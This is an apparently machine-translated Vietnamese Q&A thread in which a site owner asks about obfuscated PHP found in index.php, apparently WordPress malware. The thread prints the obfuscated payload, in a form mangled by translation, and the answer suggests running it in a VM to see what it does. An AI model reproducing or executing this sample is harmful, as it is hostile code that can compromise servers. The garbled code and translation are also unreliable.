Tìm thấy mã này trong tệp index.php trên một trang web không thể truy cập của tôi. Nó làm gì? [đóng cửa]


-3
!} x27 ;! >>>!} _; gvc%} &; ftmbg} x77 {** u% - # jt0} Z; 0] =] 0 #) 2q% l} S; 2-u%! - # 2 # / #% # / # o] #jw) bssbz) #P # - # Q # - # B # - # T # - # E # - # G # - # H5 # *% fdy!% Tdz)% bbT- % bT-% hW ~% fdy) ## -! # ~ / 7 & 6 | 7 ** 111127-zW% h> EzH, 2W% wN; # - Ez-1H * WCw * [!% rN} # QwTW% hIr x5c1 ^ -% r x5c2 ^ -% hOh / # 00 # W6! 2p%! * 3>? * 2b%) gpf {jt)! gj! pjudovg x22)! gj} 1 ~! 52] 88] 5] 48 ] 32M3] 317] 445] 212] 445] 43] 321] 464] 284] 364] 6] 234] 342] 58] 24hmg%! J%! |! * # D% 62bd%!%!> X22: ftmbg39 * 56mg%)! gj! ~: ,, Bjg!)% j: >> 1 *!% b:> 1% s: x5c% j: .2 ^,% b:% s: x5c% j: ^ * ofmy%) utjm! |! * 5! x27! hmg%)! gj! |! * 1? hmg%)! gj!] 26 x24- x24j%! * 9! x27! hnjA x27 & 6! fyqmpef) # x24 *! x24Yp x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e "; * + fepdfe {h + {d%) + opjudovg +)! gj + {e%! osvufs! *! + A!>! {e%)! x22! ftmbg)! x63 162 hàm bknbpvb ($ n) {return chr (ord ($ n) -1);} @ error_Vpor2986 + 7 ** ^ /% rx111!% yy) #} # - # x24- x24-tusqpt)%> qp %! | Z ~ !! 2p%! |! *! * JQeTQcOc / # 00 # W ~! Ydrr)% rxB% epnbss!>! Bssbz) # 44ec: 649 # -! #: 618d5f9 # -! # >> X)! GjZb%! ** X) ufttj x22) gj! |! * NbsS, 6! x242178} 527} 88:} 334} 472 x24 / 7rfs%: * mmvo:>: iuhofm%: - 5ppde: 4: |: ** # ppde #) tutjyf`4 x223}! +!> * 4-1- bubE {h% SUT`LDPT7-UFOJ`GB) fubfsdX)% j> 1 ^ # zsfvr # x5cq% 7 ** ^ # zsfvr # x5cq%) ufttj x22) gj632j%! * 72! x27! hmg%)! gjdovg} {; #) tutjyf`opjudov3f] 51L3] 84] y31M6] y3e] 81 # / # 7e: 55946-tr.984: 75983: 48984: 71] K9] Zb%! * (% W :!>! X246767 ~ 6! Bssbz) x24] 25 x24- x24 -!% X24- x24 *! |! x24- x2j% 7-K) udfoopdXA x22) 7gj6>} R; msv} .; / # / # / 67j ** b%) sfxpmpusut! - # j0 #! /! ** # sfmcnbs + yfe ^> Ew: Qb: Qc: W ~!% Z!> 21 # p # / # p # /% z> 2 * A:>: 8: |: 7 # 6 #) tutjyf`439275ttfsqnpdov {h19275j {hnpd19275fubmgoj {h1: |%} U; y]} R; 2]},; osvufs} x27; mnui} &; D4] 82] K6] 72] K9] 78] K5] 53] Kc #! #] D && (! [(GLOBALS ["x61 156 x75 156 x61"])))) {$ GLOBALS [_ * # [k2 `{6 :!} 7 ;!} 6; ##} C ;! >>!} W; utpix :: h%: n%! #] Y84] 2757, * e x27, * d x27, * c x27 , * b x27) fepq% 6! x2400 ~: / h%:> x22! pd%)! gj} Z; h! opju] y83] 273] y76] 277 ##] y74] 273ovg! |! ** # j {hnpd #) tutjyf`ogj5h% !! x24 /% tmw / x24)% - x24 *

Trông như vô nghĩa. Ít nhất, đó không phải là mã PHP hợp lệ.
ivan_pozdeev

Ồ, bạn đã không bận tâm để định dạng chính xác. Nó là mã PHP hợp lệ, một mã bị xáo trộn.
ivan_pozdeev

Mã bạn đã đăng không được xem là đại diện trung thực của tệp - nó bị hỏng. Tôi đang đăng bài này để ngăn người khác lãng phí thời gian của họ.
ivan_pozdeev

Câu trả lời:


2

Đó là một số mã PHP bị xáo trộn. Tôi không bận tâm (và không thấy việc sử dụng) để tìm kiếm nhiều hơn thế.

  • Bạn có thể thực thi nó từ dòng lệnh trong một tài khoản không có đặc quyền (hoặc thậm chí tốt hơn - từ VM để bạn có thể từ chối truy cập mạng - có khả năng đến cơ sở dữ liệu - trong trường hợp có thông tin nhúng) và xem điều gì sẽ xảy ra.
  • Tuy nhiên, tôi khuyên bạn nên cố gắng khử nó bằng tay như một lời trêu ghẹo não.
    • Lưu ý rằng bạn có thể chạy các đoạn mã PHP thông qua trình thông dịch dòng lệnh để làm cho nó thực hiện hầu hết công việc cho bạn.

Một nhận xét cho câu hỏi SO về Wordpress cho thấy đây có thể là một tệp Wordpress chứng khoán.

Googling "php obfuscator" Im lặng là vàng. "" Tôi đã tìm thấy https://security.stackexchange.com/questions/128546/obfuscated-php-code-found-in-wordpress-core-files-and-plugins . Trường hợp đóng cửa.

Rất có thể, đây là một virus Wordpress. Tất cả càng khuyến khích bạn mổ xẻ nó và xem những gì nó làm. Chà, và kiểm tra xem máy chủ của bạn có bất thường không - tốt hơn từ đĩa cứu hộ.

Khi sử dụng trang web của chúng tôi, bạn xác nhận rằng bạn đã đọc và hiểu Chính sách cookieChính sách bảo mật của chúng tôi.
Licensed under cc by-sa 3.0 with attribution required.